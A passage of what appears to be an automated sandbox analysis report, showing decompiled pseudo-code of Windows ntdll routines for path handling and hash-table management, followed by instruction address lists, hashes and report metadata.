								if(_t193 != _v232) {
									_v264 = _t193;
									E1D753B90( &_v268);
								}
								_v236 = _v232;
								_v228 = _v224;
							}
							_t194 = _v232;
							_v240 = _t194;
							if(_t194 != 0) {
								_t266 = 0;
								 *_t194 = 0;
							}
							_v244 = 0;
							_v242 = _v224;
							if(_t278 == 0xc0150001) {
								E1D7DFD60(_t266, "Internal error check failed", "minkernel\\ntdll\\sxsisol.cpp", 0x1b2, "Status != STATUS_SXS_SECTION_NOT_FOUND");
								_t278 = 0xc00000e5;
								goto L82;
							} else {
								_pop(_t274);
								_pop(_t279);
								_pop(_t263);
								return E1D784B50(_t278, _t263, _v8 ^ _t285, _t270, _t274, _t279);
							}
						}
						L51:
						if(_v176 != 0) {
							_t200 = _v208;
							if(_t200 != 0 && _t200 != _v204) {
								_v296 = _t200;
								E1D753B90( &_v300);
							}
							_t201 = _v204;
							if(_t201 != 0) {
								_t266 = 0;
								 *_t201 = 0;
							}
						}
						E1D788F40( &_v216, 0, 0x2c);
						_t285 = _t285 + 0xc;
						goto L57;
					}
					if(_t262 == 0) {
						if(_t273 != 0 || _t277 == 0) {
							L15:
							_t270 = 0;
							_v332 =  *_t266;
							_t211 = _t266[4];
							_t266 = _a12;
							_v328 = _t211;
							_v333 = 0;
							if(_t266 == 0 ||  *_t266 == 0) {
								L23:
								_t278 = 0;
								goto L24;
							} else {
								_v334 = 0;
								_t281 = E1D75AA60(1,  &_v332, 0x1d711164,  &_v284);
								if(_t281 < 0) {
									if(_t281 == 0xc0000225) {
										L19:
										_t278 = 0;
										L20:
										if(_t278 < 0) {
											L97:
											_t211 = _v328;
											_t270 = _v333;
											L24:
											if(_t278 < 0) {
												goto L51;
											}
											if(_t270 != 0) {
												_v332 = _v244;
												_t211 = _v240;
												_v328 = _t211;
											}
											_v320 = 0;
											_v334 = 0;
											if(_v312 != 0) {
												_t278 = 0xc000000d;
												goto L42;
											} else {
												_t266 = _v332;
												if(_t266 < 2) {
													L30:
													if(_t266 < 4 ||  *_t211 == 0 || _t211[1] != 0x3a || _t266 < 6) {
														L40:
														_t232 = _v334;
														goto L41;
													} else {
														_t233 = _t211[2] & 0x0000ffff;
														if(_t233 != 0x5c) {
															if(_t233 != 0x2f) {
																goto L40;
															}
														}
														_v308 = 2;
														L36:
														_t278 = E1D759690( &_v332,  &_v276,  &_v316,  &_v320, 0, 0,  &_v308, 0);
														if(_t278 < 0) {
															L42:
															_t213 = _v312;
															if(_v312 != 0) {
																E1D73BA80(_t213);
																_v320 = 0;
																_v316 = 0;
															}
															L43:
															if(_t278 < 0) {
																goto L51;
															}
															if((_a4 & 0x00000001) == 0 ||  *((intOrPtr*)( *[fs:0x30] + 0x10)) == 0 || ( *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 8) & 0x00001000) == 0) {
																L47:
																if((_v304 & 0x00000001) != 0) {
																	L77:
																	if(_t273 == 0) {
																		if(_t262 == 0 || _v212 ==  *((intOrPtr*)(_t262 + 4))) {
																			goto L78;
																		} else {
																			_t278 = 0xc0000023;
																			goto L82;
																		}
																	}
																	L78:
																	_t275 = _v292;
																	if(_t275 != 0) {
																		_t278 = E1D75AA60(1,  &_v216, 0x1d711890,  &_v324);
																		if(_t278 < 0) {
																			goto L51;
																		}
																		 *_t275 = ((_v324 & 0x0000ffff) >> 1) + 1;
																	}
																	_t266 =  &_v216;
																	_t278 = E1D77BA84( &_v216);
																	if(_t278 < 0) {
																		goto L51;
																	}
																	_t266 = _v288;
																	if(_t266 != 0) {
																		 *_t266 = _v304;
																	}
																	_t278 = 0;
																	goto L82;
																}
																if(_t262 == 0) {
																	if(_t273 != 0) {
																		goto L49;
																	}
																	_t270 = 1;
																	L50:
																	_t266 =  &_v332;
																	_t278 = E1D759DD0( &_v332, _t270,  &_v280, _v288,  &_v216);
																	if(_t278 >= 0) {
																		goto L77;
																	}
																	goto L51;
																}
																L49:
																_t270 = 0;
																goto L50;
															} else {
																_t270 =  &_v216;
																_t266 =  &_v332;
																_t278 = E1D7CD8B3( &_v332,  &_v216,  &_v304);
																if(_t278 < 0) {
																	goto L51;
																}
																goto L47;
															}
														}
														_t270 = _v320;
														_t269 =  *_t270;
														_t280 =  *((intOrPtr*)(_t270 + 4));
														_v320 = _t269;
														_v264 = _t280;
														_v300 = _t269;
														if(_v308 == 6) {
															_t240 = _v328;
															if( *((short*)(_t240 + 0xa)) != 0x3a ||  *((short*)(_t240 + 0xc)) != 0x5c) {
																goto L38;
															} else {
																_v330 = _v330 + 0xfff8;
																_t241 = _v332 + 0xfff8;
																_v328 =  &(_v328[4]);
																_t266 = _t269 + 0xfffffff8;
																_t280 = _t280 + 8;
																_v300 = _t266;
																_v298 = _v298 + 0xfff8;
																_v320 = _v300;
																_t262 = _a16;
																_v332 = _t241;
																L39:
																if(_t241 > _t266) {
																	if(_t270 ==  &_v316) {
																		_t232 = 1;
																	} else {
																		_t232 = _v334;
																	}
																	_t266 = _v320;
																	_v332 = _v320;
																	_v328 = _t280;
																	L41:
																	_t278 = 0;
																	if(_t232 != 0) {
																		goto L43;
																	}
																	goto L42;
																}
																goto L40;
															}
														}
														L38:
														_t241 = _v332;
														_t266 = _v300;
														goto L39;
													}
												}
												_t270 =  *_t211 & 0x0000ffff;
												if(_t270 == 0x5c || _t270 == 0x2f) {
													if(_t266 < 4) {
														goto L40;
													}
													_t270 = _t211[1] & 0x0000ffff;
													if(_t270 == 0x5c || _t270 == 0x2f) {
														if(_t266 < 6) {
															L110:
															_v308 = 1;
															goto L36;
														}
														_t270 = _t211[2] & 0x0000ffff;
														if(_t270 == 0x2e || _t270 == 0x3f) {
															if(_t266 < 8) {
																L109:
																if(_t266 == 6) {
																	goto L40;
																}
																goto L110;
															}
															_t244 = _t211[3] & 0x0000ffff;
															if(_t244 == 0x5c || _t244 == 0x2f) {
																_v308 = 6;
																goto L36;
															} else {
																goto L109;
															}
														} else {
															goto L110;
														}
													} else {
														goto L40;
													}
												} else {
													goto L30;
												}
											}
										}
										if(_v334 == 0) {
											_t266 = _a12;
											_v260 = _v332;
											 *((intOrPtr*)(_t285 + 0x5c)) = _v328;
											 *(_t285 + 0x60) =  *_t266;
											 *(_t285 + 0x64) = _t266[4];
											_t278 = E1D7713E0(_t266,  &_v244, 2,  &_v260);
											if(_t278 < 0) {
												goto L97;
											}
											_t211 = _v328;
											_t270 = 1;
											goto L23;
										}
										_t211 = _v328;
										_t270 = _v333;
										goto L23;
									}
									goto L20;
								}
								_v334 = 1;
								goto L19;
							}
						} else {
							L96:
							_t278 = 0xc000000d;
							goto L82;
						}
					}
					if(_t273 == 0 || _t190 != 0) {
						goto L15;
					} else {
						goto L96;
					}
				}
			}




















































































                                                                                                                              0x1d759878
                                                                                                                              0x1d759885
                                                                                                                              0x1d75988c
                                                                                                                              0x1d75988f
                                                                                                                              0x1d759892
                                                                                                                              0x1d759898
                                                                                                                              0x1d75989c
                                                                                                                              0x1d7598a0
                                                                                                                              0x1d7598ac
                                                                                                                              0x1d7598af
                                                                                                                              0x1d7598b5
                                                                                                                              0x1d7598b9
                                                                                                                              0x1d7598c1
                                                                                                                              0x1d7598c9
                                                                                                                              0x1d7598ce
                                                                                                                              0x1d7598d3
                                                                                                                              0x1d7598d8
                                                                                                                              0x1d759d36
                                                                                                                              0x1d759d36
                                                                                                                              0x1d7598e0
                                                                                                                              0x1d759d9b
                                                                                                                              0x1d759d9b
                                                                                                                              0x1d7598e8
                                                                                                                              0x1d759da2
                                                                                                                              0x1d759da2
                                                                                                                              0x1d7598f0
                                                                                                                              0x1d7598f4
                                                                                                                              0x1d7598f6
                                                                                                                              0x1d7598f6
                                                                                                                              0x1d7598f9
                                                                                                                              0x1d7598fc
                                                                                                                              0x1d759903
                                                                                                                              0x1d759907
                                                                                                                              0x1d75990b
                                                                                                                              0x1d759911
                                                                                                                              0x1d759919
                                                                                                                              0x1d759921
                                                                                                                              0x1d759929
                                                                                                                              0x1d759933
                                                                                                                              0x1d759c49
                                                                                                                              0x1d759c50
                                                                                                                              0x1d759c5b
                                                                                                                              0x1d759c62
                                                                                                                              0x1d759c69
                                                                                                                              0x1d759c72
                                                                                                                              0x1d759c7d
                                                                                                                              0x1d759c85
                                                                                                                              0x1d759939
                                                                                                                              0x1d75993d
                                                                                                                              0x1d759943
                                                                                                                              0x1d7a72e9
                                                                                                                              0x1d7a72f0
                                                                                                                              0x1d7a72f0
                                                                                                                              0x1d759949
                                                                                                                              0x1d759950
                                                                                                                              0x1d759957
                                                                                                                              0x1d75995e
                                                                                                                              0x1d759965
                                                                                                                              0x1d75996e
                                                                                                                              0x1d759972
                                                                                                                              0x1d759975
                                                                                                                              0x1d759975
                                                                                                                              0x1d75997b
                                                                                                                              0x1d759983
                                                                                                                              0x1d759983
                                                                                                                              0x1d759992
                                                                                                                              0x1d759995
                                                                                                                              0x1d75999c
                                                                                                                              0x1d7599a3
                                                                                                                              0x1d7599aa
                                                                                                                              0x1d7599b2
                                                                                                                              0x1d7a72fa
                                                                                                                              0x00000000
                                                                                                                              0x1d7599b8
                                                                                                                              0x1d7599ba
                                                                                                                              0x1d7a7304
                                                                                                                              0x1d759d71
                                                                                                                              0x1d759d73
                                                                                                                              0x1d759bd4
                                                                                                                              0x1d759bd4
                                                                                                                              0x1d759bda
                                                                                                                              0x1d7a7496
                                                                                                                              0x1d7a749b
                                                                                                                              0x1d7a74a3
                                                                                                                              0x1d7a74a3
                                                                                                                              0x1d759be0
                                                                                                                              0x1d759be6
                                                                                                                              0x1d759bec
                                                                                                                              0x1d759dad
                                                                                                                              0x1d759db6
                                                                                                                              0x1d759db6
                                                                                                                              0x1d759bf6
                                                                                                                              0x1d759bfe
                                                                                                                              0x1d759bfe
                                                                                                                              0x1d759c02
                                                                                                                              0x1d759c06
                                                                                                                              0x1d759c0c
                                                                                                                              0x1d759c0e
                                                                                                                              0x1d759c10
                                                                                                                              0x1d759c10
                                                                                                                              0x1d759c15
                                                                                                                              0x1d759c1f
                                                                                                                              0x1d759c2a
                                                                                                                              0x1d7a74c4
                                                                                                                              0x1d7a74c9
                                                                                                                              0x00000000
                                                                                                                              0x1d759c30
                                                                                                                              0x1d759c39
                                                                                                                              0x1d759c3a
                                                                                                                              0x1d759c3b
                                                                                                                              0x1d759c46
                                                                                                                              0x1d759c46
                                                                                                                              0x1d759c2a
                                                                                                                              0x1d759b8e
                                                                                                                              0x1d759b96
                                                                                                                              0x1d759b98
                                                                                                                              0x1d759ba1
                                                                                                                              0x1d7a7482
                                                                                                                              0x1d7a748b
                                                                                                                              0x1d7a748b
                                                                                                                              0x1d759bb0
                                                                                                                              0x1d759bb9
                                                                                                                              0x1d759bbb
                                                                                                                              0x1d759bbd
                                                                                                                              0x1d759bbd
                                                                                                                              0x1d759bb9
                                                                                                                              0x1d759bcc
                                                                                                                              0x1d759bd1
                                                                                                                              0x00000000
                                                                                                                              0x1d759bd1
                                                                                                                              0x1d7599c2
                                                                                                                              0x1d759c97
                                                                                                                              0x1d7599d4
                                                                                                                              0x1d7599d6
                                                                                                                              0x1d7599d8
                                                                                                                              0x1d7599dc
                                                                                                                              0x1d7599df
                                                                                                                              0x1d7599e2
                                                                                                                              0x1d7599e6
                                                                                                                              0x1d7599ec
                                                                                                                              0x1d759a3a
                                                                                                                              0x1d759a3a
                                                                                                                              0x00000000
                                                                                                                              0x1d7599f4
                                                                                                                              0x1d7599f8
                                                                                                                              0x1d759a0e
                                                                                                                              0x1d759a12
                                                                                                                              0x1d759cb5
                                                                                                                              0x1d759a1d
                                                                                                                              0x1d759a1d
                                                                                                                              0x1d759a1f
                                                                                                                              0x1d759a21
                                                                                                                              0x1d7a7320
                                                                                                                              0x1d7a7320
                                                                                                                              0x1d7a7324
                                                                                                                              0x1d759a3c
                                                                                                                              0x1d759a3e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d759a46
                                                                                                                              0x1d759d0a
                                                                                                                              0x1d759d0e
                                                                                                                              0x1d759d12
                                                                                                                              0x1d759d12
                                                                                                                              0x1d759a51
                                                                                                                              0x1d759a59
                                                                                                                              0x1d759a5e
                                                                                                                              0x1d7a732d
                                                                                                                              0x00000000
                                                                                                                              0x1d759a64
                                                                                                                              0x1d759a64
                                                                                                                              0x1d759a6d
                                                                                                                              0x1d759a84
                                                                                                                              0x1d759a88
                                                                                                                              0x1d759b13
                                                                                                                              0x1d759b13
                                                                                                                              0x00000000
                                                                                                                              0x1d759aa1
                                                                                                                              0x1d759aa1
                                                                                                                              0x1d759aa8
                                                                                                                              0x1d7a73a2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a73a8
                                                                                                                              0x1d759aae
                                                                                                                              0x1d759ab6
                                                                                                                              0x1d759ada
                                                                                                                              0x1d759ade
                                                                                                                              0x1d759b1d
                                                                                                                              0x1d759b1d
                                                                                                                              0x1d759b23
                                                                                                                              0x1d759d1c
                                                                                                                              0x1d759d21
                                                                                                                              0x1d759d29
                                                                                                                              0x1d759d29
                                                                                                                              0x1d759b29
                                                                                                                              0x1d759b2b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d759b31
                                                                                                                              0x1d759b55
                                                                                                                              0x1d759b5a
                                                                                                                              0x1d759d3d
                                                                                                                              0x1d759d3f
                                                                                                                              0x1d7a7430
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7446
                                                                                                                              0x1d7a7446
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7446
                                                                                                                              0x1d7a7430
                                                                                                                              0x1d759d45
                                                                                                                              0x1d759d45
                                                                                                                              0x1d759d4b
                                                                                                                              0x1d7a7469
                                                                                                                              0x1d7a746d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a747b
                                                                                                                              0x1d7a747b
                                                                                                                              0x1d759d51
                                                                                                                              0x1d759d5d
                                                                                                                              0x1d759d61
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d759d67
                                                                                                                              0x1d759d6d
                                                                                                                              0x1d759dc4
                                                                                                                              0x1d759dc4
                                                                                                                              0x1d759d6f
                                                                                                                              0x00000000
                                                                                                                              0x1d759d6f
                                                                                                                              0x1d759b62
                                                                                                                              0x1d759ca4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7427
                                                                                                                              0x1d759b6a
                                                                                                                              0x1d759b7b
                                                                                                                              0x1d759b84
                                                                                                                              0x1d759b88
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d759b88
                                                                                                                              0x1d759b68
                                                                                                                              0x1d759b68
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7403
                                                                                                                              0x1d7a7408
                                                                                                                              0x1d7a740f
                                                                                                                              0x1d7a7418
                                                                                                                              0x1d7a741c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7422
                                                                                                                              0x1d759b31
                                                                                                                              0x1d759ae5
                                                                                                                              0x1d759ae9
                                                                                                                              0x1d759aeb
                                                                                                                              0x1d759aee
                                                                                                                              0x1d759af2
                                                                                                                              0x1d759af6
                                                                                                                              0x1d759afa
                                                                                                                              0x1d7a73ad
                                                                                                                              0x1d7a73b6
                                                                                                                              0x00000000
                                                                                                                              0x1d7a73c7
                                                                                                                              0x1d7a73d1
                                                                                                                              0x1d7a73d6
                                                                                                                              0x1d7a73d9
                                                                                                                              0x1d7a73de
                                                                                                                              0x1d7a73e1
                                                                                                                              0x1d7a73e4
                                                                                                                              0x1d7a73e9
                                                                                                                              0x1d7a73f2
                                                                                                                              0x1d7a73f6
                                                                                                                              0x1d7a73f9
                                                                                                                              0x1d759b0a
                                                                                                                              0x1d759b0d
                                                                                                                              0x1d759d84
                                                                                                                              0x1d759dc8
                                                                                                                              0x1d759d86
                                                                                                                              0x1d759d86
                                                                                                                              0x1d759d86
                                                                                                                              0x1d759d8a
                                                                                                                              0x1d759d8e
                                                                                                                              0x1d759d92
                                                                                                                              0x1d759b17
                                                                                                                              0x1d759b17
                                                                                                                              0x1d759b1b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d759b1b
                                                                                                                              0x00000000
                                                                                                                              0x1d759b0d
                                                                                                                              0x1d7a73b6
                                                                                                                              0x1d759b00
                                                                                                                              0x1d759b00
                                                                                                                              0x1d759b05
                                                                                                                              0x00000000
                                                                                                                              0x1d759b05
                                                                                                                              0x1d759a88
                                                                                                                              0x1d759a6f
                                                                                                                              0x1d759a75
                                                                                                                              0x1d7a733b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7341
                                                                                                                              0x1d7a7348
                                                                                                                              0x1d7a7357
                                                                                                                              0x1d7a7392
                                                                                                                              0x1d7a7392
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7392
                                                                                                                              0x1d7a7359
                                                                                                                              0x1d7a7360
                                                                                                                              0x1d7a736b
                                                                                                                              0x1d7a7388
                                                                                                                              0x1d7a738c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a738c
                                                                                                                              0x1d7a736d
                                                                                                                              0x1d7a7374
                                                                                                                              0x1d7a737b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d759a75
                                                                                                                              0x1d759a5e
                                                                                                                              0x1d759a2c
                                                                                                                              0x1d759cc0
                                                                                                                              0x1d759cc7
                                                                                                                              0x1d759ccf
                                                                                                                              0x1d759cd5
                                                                                                                              0x1d759cdc
                                                                                                                              0x1d759cf1
                                                                                                                              0x1d759cf5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d759cfb
                                                                                                                              0x1d759cff
                                                                                                                              0x00000000
                                                                                                                              0x1d759cff
                                                                                                                              0x1d759a32
                                                                                                                              0x1d759a36
                                                                                                                              0x00000000
                                                                                                                              0x1d759a36
                                                                                                                              0x00000000
                                                                                                                              0x1d759cbb
                                                                                                                              0x1d759a18
                                                                                                                              0x00000000
                                                                                                                              0x1d759a18
                                                                                                                              0x1d7a7316
                                                                                                                              0x1d7a7316
                                                                                                                              0x1d7a7316
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7316
                                                                                                                              0x1d759c97
                                                                                                                              0x1d7599ca
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7599ca

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                              • API String ID: 0-3393094623
                                                                                                                              • Opcode ID: 541c7a684a76c80934af735e1a39996d53daeb4e3ff8b64f2ec827c9a9f36e17
                                                                                                                              • Instruction ID: a4b469963fe45f5f465d00733e2be8240f0d148abf3e0639d36b49fce9512a0c
                                                                                                                              • Opcode Fuzzy Hash: 541c7a684a76c80934af735e1a39996d53daeb4e3ff8b64f2ec827c9a9f36e17
                                                                                                                              • Instruction Fuzzy Hash: 5B025D75908391CFDB21CF24C180B6BB7E5BF86724F55891EE99987250E770D844CB93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D81ACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 45%
                                                                                                                              			E1D81ACEB(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int* _v12;
				signed char _v13;
				signed char _v14;
				signed char _v16;
				signed int _v20;
				signed int _v21;
				signed int _v22;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int* _t146;
				signed int _t149;
				signed int _t151;
				signed int _t167;
				signed int _t169;
				signed int _t173;
				signed char _t176;
				signed int _t195;
				void* _t211;
				signed int _t250;
				signed int _t251;
				signed int _t253;
				intOrPtr* _t254;
				signed int _t261;
				signed char _t267;
				signed char _t274;
				intOrPtr _t283;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int* _t304;
				signed char _t305;
				void* _t333;
				unsigned int _t335;
				signed int _t336;
				signed char _t337;
				unsigned int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				intOrPtr _t349;
				signed char _t351;
				signed int _t353;
				signed char _t354;
				unsigned int _t355;
				unsigned int _t356;
				signed int _t358;
				unsigned int _t360;
				void* _t361;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				signed char* _t374;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed char _t381;
				unsigned int _t383;

				_t146 = __edx;
				_v8 = __ecx;
				_v12 = __edx;
				_t251 = 0x4cb2f;
				_t3 = _t146 + 4; // 0x8b0775c0
				_t374 =  *_t3;
				_t360 =  *__edx << 2;
				if(_t360 < 8) {
					L3:
					_t361 = _t360 - 1;
					if(_t361 == 0) {
						L16:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						L17:
						_t375 = _v8;
						_t12 = _t375 + 0x1c; // 0x1d81abd2
						_v24 = _t12;
						_t149 = L1D7453C0(_t12);
						_t362 = 0;
						while(1) {
							L18:
							_t14 = _t375 + 4; // 0x8bf8558b
							_t335 =  *_t14;
							_t151 = (_t149 | 0xffffffff) << (_t335 & 0x0000001f);
							_t267 = _t251 & _t151;
							_v28 = _t151;
							_v20 = _t267;
							_v16 = _t267;
							if(_t362 != 0) {
								goto L21;
							}
							_t356 = _t335 >> 5;
							if(_t356 == 0) {
								_t362 = 0;
								L30:
								if(_t362 == 0) {
									L34:
									_t33 = _t375 + 0x1c; // 0x1d81abd2
									E1D7452F0(_t267, _t33);
									_t35 = _t375 + 0x28; // 0x8b0a74f6
									_t36 = _t375 + 0x20; // 0x8bb372c7
									 *0x1d8391e0(0xc +  *_v12 * 4,  *_t35);
									_t337 =  *((intOrPtr*)( *_t36))();
									_v16 = _t337;
									if(_t337 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										 *(_t337 + 8) =  *(_t337 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t337 + 0xb)) =  *_v12;
										 *(_t337 + 4) = _t251;
										_t46 = _t337 + 0xc; // 0xc
										_t167 = L1D752330(E1D7888C0(_t46, _v12[1],  *_v12 << 2), _v24);
										_t377 = _v8;
										_t364 = 0;
										do {
											_t49 = _t377 + 4; // 0x8bf8558b
											_t338 =  *_t49;
											_t169 = (_t167 | 0xffffffff) << (_t338 & 0x0000001f);
											_v28 = _t169;
											_t274 = _t169 & _t251;
											_v20 = _t274;
											_v24 = _t274;
											if(_t364 != 0) {
												L40:
												_t339 = _v28;
												while(1) {
													_t364 =  *_t364;
													if((_t364 & 0x00000001) != 0) {
														break;
													}
													if(_t274 == ( *(_t364 + 4) & _t339)) {
														L45:
														if(_t364 == 0) {
															L52:
															_t253 = _t377;
															_t68 = _t253 + 0x28; // 0x8b0a74f6
															_t69 = _t253 + 4; // 0x8bf8558b
															_t378 =  *_t69;
															_t70 = _t253 + 0x20; // 0x8bb372c7
															_t365 =  *_t70;
															_v28 =  *_t68;
															_t72 = _t253 + 0x24; // 0x85f633fe
															_v40 =  *_t72;
															_t173 = _t378 >> 5;
															if( *_t253 < _t173 + _t173) {
																L73:
																_t380 = _v16;
																_t364 = _t380;
																_t176 = (_t173 | 0xffffffff) << (_t378 & 0x0000001f) &  *(_t380 + 4);
																_v40 = _t176;
																_v28 = _t176;
																_t343 = (_t378 >> 0x00000005) - 0x00000001 & ((((_t176 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_v40 & 0x000000ff)) * 0x00000025 + (_v26 & 0x000000ff)) * 0x00000025 + (_v25 & 0x000000ff);
																_t136 = _t253 + 8; // 0xc183f44d
																_t283 =  *_t136;
																 *_t380 =  *(_t283 + _t343 * 4);
																 *(_t283 + _t343 * 4) = _t380;
																 *_t253 =  *_t253 + 1;
																_t381 = 0;
																L74:
																_t141 = _t253 + 0x1c; // 0x1d81abd2
																E1D7524D0(_t141);
																if(_t381 != 0) {
																	_t142 = _t253 + 0x28; // 0x8b0a74f6
																	_t143 = _t253 + 0x24; // 0x85f633fe
																	 *0x1d8391e0(_t381,  *_t142);
																	 *((intOrPtr*)( *_t143))();
																}
																L76:
																return _t364;
															}
															_t285 = 2;
															_t173 = E1D774CF8( &_v24, _t173 * _t285, _t173 * _t285 >> 0x20);
															if(_t173 < 0) {
																goto L73;
															}
															_t383 = _v24;
															if(_t383 < 4) {
																_t383 = 4;
															}
															 *0x1d8391e0(_t383 << 2, _v28);
															_t173 =  *_t365();
															_t345 = _t173;
															_v12 = _t345;
															if(_t345 == 0) {
																_t144 = _t253 + 4; // 0x8bf8558b
																_t378 =  *_t144;
																if(_t378 >= 0x20) {
																	goto L73;
																}
																_t381 = _v16;
																_t364 = 0;
																goto L74;
															} else {
																_t83 = _t383 - 1; // 0x3
																_t288 = _t83;
																if((_t383 & _t288) == 0) {
																	L61:
																	if(_t383 > 0x4000000) {
																		_t383 = 0x4000000;
																	}
																	_t366 = _t345;
																	_v24 = _v24 & 0x00000000;
																	_t195 = _t253 | 0x00000001;
																	asm("sbb ecx, ecx");
																	_t292 =  !( &(_v12[_t383])) & _t383 << 0x00000002 >> 0x00000002;
																	if(_t292 <= 0) {
																		L66:
																		_t92 = _t253 + 4; // 0x8bf8558b
																		_t367 = 0;
																		_v32 = (_t195 | 0xffffffff) << ( *_t92 & 0x0000001f);
																		if(( *(_t253 + 4) & 0xffffffe0) <= 0) {
																			L71:
																			_t121 = _t253 + 8; // 0xc183f44d
																			_t295 =  *_t121;
																			 *((intOrPtr*)(_t253 + 8)) = _v12;
																			_t124 = _t253 + 4; // 0x8bf8558b
																			_t173 =  *_t124 & 0x0000001f;
																			_t378 = _t383 << 0x00000005 | _t173;
																			 *(_t253 + 4) = _t378;
																			if(_t295 != 0) {
																				 *0x1d8391e0(_t295, _v28);
																				_t173 =  *_v40();
																				_t128 = _t253 + 4; // 0x8bf8558b
																				_t378 =  *_t128;
																			}
																			goto L73;
																		} else {
																			goto L67;
																		}
																		do {
																			L67:
																			_t97 = _t253 + 8; // 0xc183f44d
																			_t349 =  *_t97;
																			_v36 = _t349;
																			while(1) {
																				_t297 =  *(_t349 + _t367 * 4);
																				_v20 = _t297;
																				if((_t297 & 0x00000001) != 0) {
																					goto L70;
																				}
																				 *(_t349 + _t367 * 4) =  *_t297;
																				_t351 =  *(_t297 + 4) & _v32;
																				_t254 = _v20;
																				_v24 = _t351;
																				_t353 = _t383 - 0x00000001 & ((((_t351 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_t351 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025 + (_v21 & 0x000000ff);
																				_t304 = _v12;
																				 *_t254 =  *((intOrPtr*)(_t304 + _t353 * 4));
																				 *((intOrPtr*)(_t304 + _t353 * 4)) = _t254;
																				_t349 = _v36;
																			}
																			L70:
																			_t253 = _v8;
																			_t367 = _t367 + 1;
																			_t120 = _t253 + 4; // 0x8bf8558b
																		} while (_t367 <  *_t120 >> 5);
																		goto L71;
																	} else {
																		_t354 = _v24;
																		do {
																			_t354 = _t354 + 1;
																			 *_t366 = _t195;
																			_t366 = _t366 + 4;
																		} while (_t354 < _t292);
																		goto L66;
																	}
																}
																_t305 = _t288 | 0xffffffff;
																if(_t383 == 0) {
																	L60:
																	_t383 = 1 << _t305;
																	goto L61;
																} else {
																	goto L59;
																}
																do {
																	L59:
																	_t305 = _t305 + 1;
																	_t383 = _t383 >> 1;
																} while (_t383 != 0);
																goto L60;
															}
														}
														goto L46;
													}
												}
												_t364 = 0;
												goto L45;
											}
											_t355 = _t338 >> 5;
											if(_t355 == 0) {
												_t364 = 0;
												L49:
												if(_t364 == 0) {
													goto L52;
												}
												_t66 = _t364 + 8; // 0x8
												_t211 = E1D81AC6F(_t66);
												_t253 = _t377;
												_t381 = _v16;
												if(_t211 == 0) {
													_t364 = 0;
												}
												goto L74;
											}
											_t56 = _t355 - 1; // 0x8bf8558a
											_t57 = _t377 + 8; // 0xc183f44d
											_t364 =  *_t57 + (_t56 & (_v21 & 0x000000ff) + 0x164b2f3f + (((_t274 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025) * 4;
											_t274 = _v20;
											goto L40;
											L46:
											_t167 = E1D81ACB2(_t364, _v12);
										} while (_t167 == 0);
										goto L49;
									}
									_t364 = 0;
									goto L76;
								}
